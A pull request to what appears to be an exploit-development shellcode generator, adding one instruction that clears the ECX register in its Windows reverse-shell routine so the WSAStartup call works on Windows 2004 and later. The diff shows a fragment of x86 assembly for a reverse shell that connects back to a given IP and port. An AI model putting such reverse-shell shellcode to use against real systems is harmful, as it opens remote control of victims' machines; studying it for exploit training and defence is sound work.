### PR TITLE
The shellcode in the manual doesn't work on Windows 2004 and above

### DIFF
--- a/shellcoder.py
+++ b/shellcoder.py
@@ -182,6 +182,7 @@ def rev_shellcode(rev_ip_addr, rev_port, breakpoint=0):
         "       mov [ebp+0x24], eax             ;",  # Save WSAConnect address for later usage
         "   call_wsastartup:                    ;",
         "       mov eax, esp                    ;",  # Move ESP to EAX
+        "       xor ecx, ecx                    ;",
         "       mov cx, 0x590                   ;",  # Move 0x590 to CX
         "       sub eax, ecx                    ;",  # Substract CX from EAX to avoid overwriting the structure later
         "       push eax                        ;",  # Push lpWSAData


### PR DESCRIPTION
VirtualAlloc clobbers the ECX register in Windows 2004 and above. I just clear the register to ensure that the call to WSAStartup doesn't fail.